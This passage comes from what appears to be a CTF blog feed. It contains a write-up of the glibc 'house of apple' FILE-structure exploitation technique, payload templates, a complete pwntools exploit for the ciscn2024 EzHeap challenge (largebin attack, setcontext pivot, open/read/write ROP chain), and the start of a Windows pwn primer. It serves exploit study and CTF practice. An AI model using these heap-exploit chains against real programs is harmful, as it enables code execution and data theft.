class="hljs-number">*3</span>+p64(fake_heap-0x10)+p64(0)<br>payload +=b<span class="hljs-string">'\x00'</span><span class="hljs-number">*0</span>x28+p64(fake_heap)<br>payload +=p64(swapcontext)<br>payload = payload.ljust(0x128,b<span 
class="hljs-string">'\x00'</span>)+p64(fake_heap+0x130)+p64(ret)<span class="hljs-number">*2</span>+p64(pop_rdi)+p64(bin_sh)+p64(system)<br>payload = payload.ljust(0x168,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)<br><span class="hljs-built_in">edit</span>(3,payload)<br>dbg()<br>cmd(5)<br><br>ia()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>house_of_apple</title>
<link href="/2024/05/20/house-of-apple/"/>
<url>/2024/05/20/house-of-apple/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h1><p>While playing CISCN I was suddenly burned by Gitee: the blog posts (some notes) I had published earlier were all gone, so when working on a high-version glibc heap challenge I could not find the template I had saved, which left me stumped. Following other players' advice I then used house of apple. I had actually studied it before, but probably forgot it because I had not touched it for so long, so this post records the house of apple technique and its general principle again.</p><h1 id="利用条件"><a href="#利用条件" class="headerlink" title="Exploitation prerequisites"></a>Exploitation prerequisites</h1><p>1. A leaked heap address and a leaked libc address</p><p>2. The ability to make the program perform IO operations, including but not limited to: returning from main, calling exit, or triggering through _malloc_assert</p><p>3. Control over the _IO_FILE vtable and _wide_data, usually obtained with a largebin attack</p><h1 id="利用原理"><a href="#利用原理" class="headerlink" title="Exploitation principle"></a>Exploitation principle</h1><p>The three _IO_FILE structures stdin/stdout/stderr use the _IO_file_jumps vtable, and when a function pointer in the vtable needs to be called, the call goes through macros. Taking the _IO_file_overflow call as an example, the relevant glibc code fragments are analysed as follows</p><figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs lisp">#define _IO_OVERFLOW(<span class="hljs-name">FP</span>, CH) JUMP1 (<span class="hljs-name">__overflow</span>, FP, CH)<br> <br>#define JUMP1(<span class="hljs-name">FUNC</span>, THIS, X1) (<span class="hljs-name">_IO_JUMPS_FUNC</span>(<span class="hljs-name">THIS</span>)->FUNC) (<span class="hljs-name">THIS</span>, X1)<br> <br># define _IO_JUMPS_FUNC(<span class="hljs-name">THIS</span>) (<span class="hljs-name">IO_validate_vtable</span> (<span class="hljs-name">_IO_JUMPS_FILE_plus</span> (<span class="hljs-name">THIS</span>)))<br></code></pre></td></tr></table></figure><p>Here, the <code>IO_validate_vtable</code> function is responsible for checking the legitimacy of the <code>vtable</code>: it tests whether the <code>vtable</code> address lies within a legitimate range. If the <code>vtable</code> address is not legitimate, the program aborts.</p><p>Looking at the <code>struct _IO_wide_data</code> structure, we find that it has a corresponding <code>_wide_vtable</code> member.</p><figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs sqf">struct <span class="hljs-variable">_IO_wide_data</span><br>{<br> wchar_t *<span class="hljs-variable">_IO_read_ptr</span>; <span class="hljs-comment">/* Current read pointer */</span><br> wchar_t *<span class="hljs-variable">_IO_read_end</span>; <span class="hljs-comment">/* End of get area. */</span><br> wchar_t *<span class="hljs-variable">_IO_read_base</span>; <span class="hljs-comment">/* Start of putback+get area. */</span><br> wchar_t *<span class="hljs-variable">_IO_write_base</span>; <span class="hljs-comment">/* Start of put area. */</span><br> wchar_t *<span class="hljs-variable">_IO_write_ptr</span>; <span class="hljs-comment">/* Current put pointer. */</span><br> wchar_t *<span class="hljs-variable">_IO_write_end</span>; <span class="hljs-comment">/* End of put area. */</span><br> wchar_t *<span class="hljs-variable">_IO_buf_base</span>; <span class="hljs-comment">/* Start of reserve area. */</span><br> wchar_t *<span class="hljs-variable">_IO_buf_end</span>; <span class="hljs-comment">/* End of reserve area. */</span><br> <span class="hljs-comment">/* The following fields are used to support backing up and undo. */</span><br> wchar_t *<span class="hljs-variable">_IO_save_base</span>; <span class="hljs-comment">/* Pointer to start of non-current get area. 
*/</span><br> wchar_t *<span class="hljs-variable">_IO_backup_base</span>; <span class="hljs-comment">/* Pointer to first valid character of</span><br><span class="hljs-comment"> backup area */</span><br> wchar_t *<span class="hljs-variable">_IO_save_end</span>; <span class="hljs-comment">/* Pointer to end of non-current get area. */</span><br> <br> <span class="hljs-variable">__mbstate_t</span> <span class="hljs-variable">_IO_state</span>;<br> <span class="hljs-variable">__mbstate_t</span> <span class="hljs-variable">_IO_last_state</span>;<br> struct <span class="hljs-variable">_IO_codecvt</span> <span class="hljs-variable">_codecvt</span>;<br> wchar_t <span class="hljs-variable">_shortbuf</span>[<span class="hljs-number">1</span>];<br> const struct <span class="hljs-variable">_IO_jump_t</span> *<span class="hljs-variable">_wide_vtable</span>;<br>};<br></code></pre></td></tr></table></figure><p>在调用<code>_wide_vtable</code>虚表里面的函数时,同样是使用宏去调用,仍然以<code>vtable->_overflow</code>调用为例,所用到的宏依次为:</p><figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs scss"><span class="hljs-selector-id">#define</span> <span class="hljs-built_in">_IO_WOVERFLOW</span>(FP, CH) WJUMP1 (__overflow, FP, CH)<br> <br><span class="hljs-selector-id">#define</span> <span class="hljs-built_in">WJUMP1</span>(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)<br> <br><span class="hljs-selector-id">#define</span> <span class="hljs-built_in">_IO_WIDE_JUMPS_FUNC</span>(THIS) <span class="hljs-built_in">_IO_WIDE_JUMPS</span>(THIS)<br> <br><span class="hljs-selector-id">#define</span> <span class="hljs-built_in">_IO_WIDE_JUMPS</span>(THIS) \<br> _IO_CAST_FIELD_ACCESS ((THIS), struct 
_IO_FILE, _wide_data)->_wide_vtable<br></code></pre></td></tr></table></figure><p>As can be seen, when a member function pointer inside <code>_wide_vtable</code> is called, <strong>there is no legitimacy check on the vtable</strong>.</p><p>Therefore, we can hijack the <code>vtable</code> of the <code>IO_FILE</code> to <code>_IO_wfile_jumps</code>, point <code>_wide_data</code> at controlled heap memory, and thereby point <code>_wide_data->_wide_vtable</code> at controlled heap memory as well. By making the program perform an <code>IO</code> stream function call that eventually reaches an <code>_IO_Wxxxxx</code> function, we gain control of the program's execution flow.</p><h1 id="链路分析"><a href="#链路分析" class="headerlink" title="Call-chain analysis"></a>Call-chain analysis</h1><p>The trigger is the same as for house of apple 1: an explicit call to exit, the implicit exit on return from main, or malloc_assert printing an error message</p><p>Below is the chain triggered through exit</p><p>exit -> fcloseall -> _IO_cleanup -> _IO_flush_all_lockp -> _IO_OVERFLOW</p><p>The main idea is to hijack IO_list_all to a heap address so that we can forge an IO structure</p><p>Two members matter most here: _wide_data and vtable</p><p>Let us start with vtable; the idea is to forge it as _IO_wfile_jumps</p><p>That way, when IO is triggered, _IO_wfile_overflow is called; let us look at the main content of this function</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405201617930.png" alt="image-20240520161714872"></p><p>Internally it calls the wdoallocbuf function, which contains an arbitrary function call site</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405201618469.png" alt="image-20240520161825922"></p><p>The index comes from the rax register</p><p>And at this point the value of rax is the wide_data member at offset 0xa0 of the fake IO structure</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405201620769.png" alt="image-20230716161559230"></p><p>wide_data is expected to be a structure pointer; wdoallocbuf calls the overflow function of that structure's vtable</p><p>If we set it to setcontext, we can run a ROP chain, which works even when a sandbox is enabled</p><h1 id="伪造分析"><a href="#伪造分析" class="headerlink" title="Forgery analysis"></a>Forgery analysis</h1><p>There are only a few key points to forge</p><p>1. First overwrite _IO_list_all with a controlled address using a largebin attack, to hold the forged structure, called fakeio1 below</p><p>2. Set the vtable of fakeio1 to _IO_wfile_jumps so that _IO_wfile_overflow is called</p><p>3. Set the _wide_data of fakeio1 to fakeio2</p><p>4. Set the vtable of fakeio2 to fakeio3</p><p>5. Set offset 0x68 of fakeio3 to setcontext</p><p>Note that the location where the final ROP chain is stored must not clobber the other members of the fake IO structures, or the execution flow will not proceed as intended</p><p>Also, the reason we do not simply set _wide_data->vtable->0x68 to system and put /bin/sh at the start of the fake IO structure is that this corrupts the flags member, so the execution flow no longer proceeds as expected</p><p>For the rest, refer to the template below</p><figure class="highlight stylus"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs stylus">fakeio1<br><br><br>IO_wfile_jumps = libc_addr + <span class="hljs-number">0</span>x2160c0<br>fake_file = b<span class="hljs-string">''</span><br>fake_file = fake_file<span class="hljs-selector-class">.ljust</span>(<span class="hljs-number">0</span>x20,b<span class="hljs-string">'\x00'</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">1</span>)<br>fake_file = fake_file<span class="hljs-selector-class">.ljust</span>(<span class="hljs-number">0</span>xa0,b<span class="hljs-string">'\x00'</span>)+<span class="hljs-built_in">p64</span>(chunk5_addr)<br>fake_file = fake_file<span class="hljs-selector-class">.ljust</span>(<span class="hljs-number">0</span>xd8,b<span class="hljs-string">'\x00'</span>)+<span class="hljs-built_in">p64</span>(IO_wfile_jumps)<br>payload = <span class="hljs-built_in">cyclic</span>(<span class="hljs-number">0</span>x10)+fake_file<br></code></pre></td></tr></table></figure><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs stylus">fakeio2<br><br><br>payload = b<span class="hljs-string">''</span><br>payload = payload<span class="hljs-selector-class">.ljust</span>(<span class="hljs-number">0</span>x58,b<span class="hljs-string">'\x00'</span>)+<span class="hljs-built_in">p64</span>(setcontext)<br>payload = payload<span 
class="hljs-selector-class">.ljust</span>(<span class="hljs-number">0</span>x90,b<span class="hljs-string">'\x00'</span>)+<span class="hljs-built_in">p64</span>(chunk5_addr+<span class="hljs-number">0</span>xf0)+<span class="hljs-built_in">p64</span>(ret_addr)<br>payload = payload<span class="hljs-selector-class">.ljust</span>(<span class="hljs-number">0</span>xd0,b<span class="hljs-string">'\x00'</span>)+<span class="hljs-built_in">p64</span>(chunk5_addr)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>)+<span class="hljs-built_in">p64</span>(rdi_addr)+<span class="hljs-built_in">p64</span>(binsh_addr)+<span class="hljs-built_in">p64</span>(system_addr)<br></code></pre></td></tr></table></figure><h1 id="例题-ciscn2024-EzHeap"><a href="#例题-ciscn2024-EzHeap" class="headerlink" title="Example: ciscn2024-EzHeap"></a>Example: ciscn2024-EzHeap</h1><p>A standard heap challenge with a sandbox enabled</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405201634167.png" alt="image-20240520163411114"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405201637122.png" alt="image-20240520163724047"></p><p>The vulnerability is in edit, an obvious heap overflow<img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405201637746.png" alt="image-20240520163753696"></p><p>First set up a largebin chunk, then leak the libc address and the heap address, and then simply apply the template above for house of apple (calling open/read/write directly did not seem to work, but using syscall does)</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 
class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span 
class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">from</span> pwn import *<br><span class="hljs-attribute">from</span> ctypes import *<br><span class="hljs-attribute">from</span> struct import pack<br><span class="hljs-attribute">banary</span> = <span class="hljs-string">"./EzHeap"</span><br><span class="hljs-attribute">elf</span> = ELF(banary)<br><span class="hljs-attribute">libc</span> = ELF(<span class="hljs-string">"./libc.so.6"</span>)<br><span 
class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><br><span class="hljs-attribute">ip</span> = ''<br><span class="hljs-attribute">port</span> = <span class="hljs-number">0</span><br><span class="hljs-attribute">local</span> = <span class="hljs-number">1</span><br><span class="hljs-attribute">if</span> local:<br> <span class="hljs-attribute">io</span> = process(banary)<br><span class="hljs-attribute">else</span>:<br> <span class="hljs-attribute">io</span> = remote(ip, port)<br><br><span class="hljs-attribute">context</span>(log_level = 'debug', os = 'linux', arch = 'amd64')<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-attribute">def</span> dbg():<br> <span class="hljs-attribute">gdb</span>.attach(io)<br> <span class="hljs-attribute">pause</span>()<br><br><span class="hljs-attribute">s</span> = lambda data : io.send(data)<br><span class="hljs-attribute">sl</span> = lambda data : io.sendline(data)<br><span class="hljs-attribute">sa</span> = lambda text, data : io.sendafter(text, data)<br><span class="hljs-attribute">sla</span> = lambda text, data : io.sendlineafter(text, data)<br><span class="hljs-attribute">r</span> = lambda : io.recv()<br><span class="hljs-attribute">ru</span> = lambda text : io.recvuntil(text)<br><span class="hljs-attribute">uu32</span> = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, b'\x00'))<br><span class="hljs-attribute">uu64</span> = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, b<span class="hljs-string">"\x00"</span>))<br><span class="hljs-attribute">iuu32</span> = lambda : int(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br><span class="hljs-attribute">iuu64</span> = lambda : int(io.recv(<span 
class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br><span class="hljs-attribute">uheap</span> = lambda : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,b'\x00'))<br><span class="hljs-attribute">lg</span> = lambda data : io.success('%s -> <span class="hljs-number">0</span>x%x' % (data, eval(data)))<br><span class="hljs-attribute">ia</span> = lambda : io.interactive()<br><br><span class="hljs-attribute">def</span> cmd(choice):<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"choice >> "</span>)<br> <span class="hljs-attribute">sl</span>(str(choice))<br><br><span class="hljs-attribute">def</span> add(size,content):<br> <span class="hljs-attribute">cmd</span>(<span class="hljs-number">1</span>)<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"size:"</span>)<br> <span class="hljs-attribute">sl</span>(str(size))<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"content:"</span>)<br> <span class="hljs-attribute">s</span>(content)<br><br><span class="hljs-attribute">def</span> delete(index):<br> <span class="hljs-attribute">cmd</span>(<span class="hljs-number">2</span>)<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"idx:"</span>)<br> <span class="hljs-attribute">sl</span>(str(index))<br><br><span class="hljs-attribute">def</span> edit(index,content):<br> <span class="hljs-attribute">size</span>=len(content)<br> <span class="hljs-attribute">cmd</span>(<span class="hljs-number">3</span>)<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"idx:"</span>)<br> <span class="hljs-attribute">sl</span>(str(index))<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"size:"</span>)<br> <span class="hljs-attribute">sl</span>(str(size))<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"content:"</span>)<br> <span class="hljs-attribute">s</span>(content)<br><br><span 
class="hljs-attribute">def</span> show(index):<br> <span class="hljs-attribute">cmd</span>(<span class="hljs-number">4</span>)<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"idx:"</span>)<br> <span class="hljs-attribute">sl</span>(str(index))<br><br><span class="hljs-attribute">add</span>(<span class="hljs-number">0</span>x200,b'/bin/sh\x00')#<span class="hljs-number">0</span><br><span class="hljs-attribute">add</span>(<span class="hljs-number">0</span>x468,b'youlin')#<span class="hljs-number">1</span><br><span class="hljs-attribute">add</span>(<span class="hljs-number">0</span>x228,b'youlin')#<span class="hljs-number">2</span><br><span class="hljs-attribute">add</span>(<span class="hljs-number">0</span>x430,b'youlin')#<span class="hljs-number">3</span><br><br><span class="hljs-attribute">delete</span>(<span class="hljs-number">1</span>)<br><span class="hljs-attribute">add</span>(<span class="hljs-number">0</span>x470,b'sbgitee0')#<span class="hljs-number">1</span><br><span class="hljs-attribute">edit</span>(<span class="hljs-number">0</span>,b'A'*<span class="hljs-number">0</span>x200+b'B'*<span class="hljs-number">0</span>x10)#p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">0</span>x471)<br><span class="hljs-attribute">show</span>(<span class="hljs-number">0</span>)<br><span class="hljs-attribute">fd</span>=uu64()<br><span class="hljs-attribute">libcbase</span>=fd-<span class="hljs-number">0</span>x21b0e0<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"fd"</span>)<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"libcbase"</span>)<br><span class="hljs-attribute">_IO_list_all</span> = libcbase + libc.sym['_IO_list_all']<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"_IO_list_all"</span>)<br><br><span class="hljs-attribute">edit</span>(<span class="hljs-number">0</span>,b'A'*<span class="hljs-number">0</span>x200+b'A'*<span 
class="hljs-number">0</span>x10+b'B'*<span class="hljs-number">0</span>x10)<br><span class="hljs-attribute">show</span>(<span class="hljs-number">0</span>)<br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"B"</span>*<span class="hljs-number">0</span>x10)<br><span class="hljs-attribute">heapbase</span>=uheap()-<span class="hljs-number">0</span>x2510<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"heapbase"</span>)<br><br><span class="hljs-attribute">edit</span>(<span class="hljs-number">0</span>,b'A'*<span class="hljs-number">0</span>x200+p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">0</span>x471)+p64(fd)*<span class="hljs-number">2</span>+p64(heapbase+<span class="hljs-number">0</span>x2510)+p64(_IO_list_all-<span class="hljs-number">0</span>x20))<br><span class="hljs-attribute">delete</span>(<span class="hljs-number">3</span>)<br><span class="hljs-attribute">add</span>(<span class="hljs-number">0</span>x480,b'sbgitee')#<span class="hljs-number">3</span><br><br><span class="hljs-attribute">fake_heap</span>=heapbase+<span class="hljs-number">0</span>x2990+<span class="hljs-number">0</span>x10<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"fake_heap"</span>)<br><span class="hljs-attribute">IO_wfile_jumps</span> = libcbase + <span class="hljs-number">0</span>x2170c0<br><span class="hljs-attribute">fake_file</span> = b''<br><span class="hljs-attribute">fake_file</span> = fake_file.ljust(<span class="hljs-number">0</span>x20,b'\x00')+p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">1</span>)<br><span class="hljs-attribute">fake_file</span> = fake_file.ljust(<span class="hljs-number">0</span>xa0,b'\x00')+p64(fake_heap)<br><span class="hljs-attribute">fake_file</span> = fake_file.ljust(<span class="hljs-number">0</span>xd8,b'\x00')+p64(IO_wfile_jumps)<br><span class="hljs-attribute">payload</span> = cyclic(<span class="hljs-number">0</span>x10)+fake_file<br><span 
class="hljs-attribute">edit</span>(<span class="hljs-number">2</span>,cyclic(<span class="hljs-number">0</span>x210)+payload)<br><br><span class="hljs-attribute">flag_addr</span> = fake_heap-<span class="hljs-number">0</span>x10<br><span class="hljs-attribute">setcontext</span> = libcbase + libc.sym['setcontext']+<span class="hljs-number">61</span><br><span class="hljs-attribute">ret_addr</span> = libcbase + <span class="hljs-number">0</span>x0000000000029139<br><span class="hljs-attribute">rdi_addr</span> = libcbase + <span class="hljs-number">0</span>x000000000002a3e5<br><span class="hljs-attribute">rsi_addr</span> = libcbase + <span class="hljs-number">0</span>x000000000002be51<br><span class="hljs-attribute">rdx_r12_addr</span> = libcbase + <span class="hljs-number">0</span>x000000000011f2e7 <br><span class="hljs-attribute">open_addr</span> = libcbase + libc.sym['open']<br><span class="hljs-attribute">rax_addr</span> = libcbase + next(libc.search(asm(<span class="hljs-string">"pop rax;ret"</span>)))<br><span class="hljs-attribute">read_addr</span> = libcbase + libc.sym['read']<br><span class="hljs-attribute">write_addr</span> = libcbase + libc.sym['write']<br><span class="hljs-attribute">syscall_addr</span> = read_addr+<span class="hljs-number">0</span>x10<br><span class="hljs-attribute">payload</span> = b'flag\x00'<br><span class="hljs-attribute">payload</span> = payload.ljust(<span class="hljs-number">0</span>x68,b'\x00')+p64(setcontext)<br><span class="hljs-attribute">payload</span> = payload.ljust(<span class="hljs-number">0</span>xb0,b'\x00')+p64(fake_heap+<span class="hljs-number">0</span>xf0)+p64(ret_addr)<br><span class="hljs-attribute">payload</span> = payload.ljust(<span class="hljs-number">0</span>xd0,b'\x00')+p64(fake_heap)+p64(<span class="hljs-number">0</span>)*<span class="hljs-number">3</span>+p64(fake_heap-<span class="hljs-number">0</span>x10)+p64(<span class="hljs-number">0</span>)<br><span class="hljs-attribute">payload</span> += 
p64(rax_addr)+p64(<span class="hljs-number">2</span>)+p64(rdi_addr)+p64(flag_addr)+p64(rsi_addr)+p64(<span class="hljs-number">0</span>)+p64(syscall_addr)<br><span class="hljs-attribute">payload</span> += p64(rax_addr)+p64(<span class="hljs-number">0</span>)+p64(rdi_addr)+p64(<span class="hljs-number">3</span>)+p64(rsi_addr)+p64(fake_heap+<span class="hljs-number">0</span>x4000)+p64(rdx_r12_addr)+p64(<span class="hljs-number">0</span>x100)*<span class="hljs-number">2</span>+p64(syscall_addr)<br><span class="hljs-attribute">payload</span> += p64(rax_addr)+p64(<span class="hljs-number">1</span>)+p64(rdi_addr)+p64(<span class="hljs-number">1</span>)+p64(rsi_addr)+p64(fake_heap+<span class="hljs-number">0</span>x4000)+p64(rdx_r12_addr)+p64(<span class="hljs-number">0</span>x100)*<span class="hljs-number">2</span>+p64(syscall_addr)<br><span class="hljs-attribute">edit</span>(<span class="hljs-number">2</span>,payload)<br><span class="hljs-attribute">dbg</span>()<br><span class="hljs-attribute">cmd</span>(<span class="hljs-number">5</span>)<br><span class="hljs-attribute">ia</span>()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>winpwn入门</title>
<link href="/2024/04/07/winpwn%E5%85%A5%E9%97%A8/"/>
<url>/2024/04/07/winpwn%E5%85%A5%E9%97%A8/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h1><p>NKCTF happened to include a winpwn challenge. It was fairly simple, so I took the chance to learn the basics, mainly some debugging and attack techniques.</p><p>References:</p><p><a href="https://xz.aliyun.com/t/11865?time__1311=mqmx0DBD9DyDnDfx4BuQx20UeyDtiiQYieD&alichlgref=https://xz.aliyun.com/u/62994">z1r0</a></p><h1 id="安装checksec"><a href="#安装checksec" class="headerlink" title="Installing checksec"></a>Installing checksec</h1><p><a href="https://github.com/Wenzel/checksec.py">https://github.com/Wenzel/checksec.py</a></p><p>Download <a href="https://github.com/Wenzel/checksec.py/releases/download/v0.6.2/checksec.exe">checksec.exe</a> from its releases page.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072122678.png" alt="image-20240407212232225"></p><h1 id="安装winserver"><a href="#安装winserver" class="headerlink" title="Installing win_server"></a>Installing win_server</h1><p><a href="https://github.com/Ex-Origin/win_server">https://github.com/Ex-Origin/win_server</a></p><p>This works like hosting a pwn challenge: it exposes an exe on a TCP port.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">git clone https://github.com/Ex-Origin/win_server.git<br></code></pre></td></tr></table></figure><p>After the git clone above it is ready to use. Usage: <code>.\win_server.exe a.exe 1234</code> exposes a.exe on port 1234; connecting with nc shows the program runs normally.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202404072125725.png" alt="image-20240407212557512"></p><p>With that, pwntools can be used for winpwn as usual, and it also makes debugging the program with IDA convenient.</p><h1 id="winpwn保护机制"><a href="#winpwn保护机制" class="headerlink" title="winpwn protection mechanisms"></a>winpwn protection mechanisms</h1><p>NX: on Windows this is actually DEP, the non-executable stack and heap protection.</p><p>Canary: on Windows this is actually GS; the tool's developer probably labelled it Canary so it is easier to understand. Note, however, that this tool's canary detection may be inaccurate.</p><p>ASLR: put simply, address randomization: the addresses of the exe and all DLLs are randomized, which is why the well-known <strong>Heap Spray</strong> exploitation technique exists. Heap Spray places a large amount of slide 
code (NOP-sled instructions) in front of the shellcode to form an injected code segment, then requests a large amount of memory from the system and fills it repeatedly with that segment, so that the process address space is largely occupied by injected code. Combined with another vulnerability that controls program flow, execution is steered onto the heap and the shellcode eventually runs.</p><p>Dynamic Base: the /DYNAMICBASE option at build time indicates whether the program opts in to ASLR.</p><p>High Entropy VA: if this option is specified, a compatible version of the Windows kernel can use higher entropy when it randomizes the process address space layout as part of ASLR. With higher entropy, more addresses can be assigned to memory regions such as the stack and heap, so the location of a given region becomes harder to guess. When the option is on, the target executable and any module it depends on must be able to handle pointer values larger than 4 GB when running as a 64-bit process.</p><p>SEH: Structured Exception Handling (SEH) is the technique the Windows operating system provides for handling errors and exceptions. It is a system mechanism of Windows and is independent of any particular programming language; it gives Windows designers a way to handle program errors and exceptions, making the system more robust.</p><p>SafeSEH: to stop an attacker from hijacking control flow by overwriting an exception handler pointer on the stack, the handler is put through a series of validity checks before it is called; if the handler is found to be untrusted, the call is aborted immediately. SafeSEH needs support from both the compiler and the operating system; if either is missing, the protection is essentially lost.</p><p>Force Integrity: mandatory signature enforcement.</p><p>Control Flow Guard: Control Flow Guard (CFG) is a highly optimized platform security feature designed to combat memory corruption vulnerabilities. By tightly restricting where an application can execute code from, it makes it much harder for an exploit (such as a buffer overflow) to run arbitrary code.</p><p>Isolation: isolation protection, enabled by default.</p><p>Authenticode: signature protection.</p><h1 id="ida调试"><a href="#ida调试" class="headerlink" title="Debugging with IDA"></a>Debugging with IDA</h1><h2 id="ida直接调试程序"><a href="#ida直接调试程序" class="headerlink" title="Debugging the program directly in IDA"></a>Debugging the program directly in IDA</h2><p>First set a 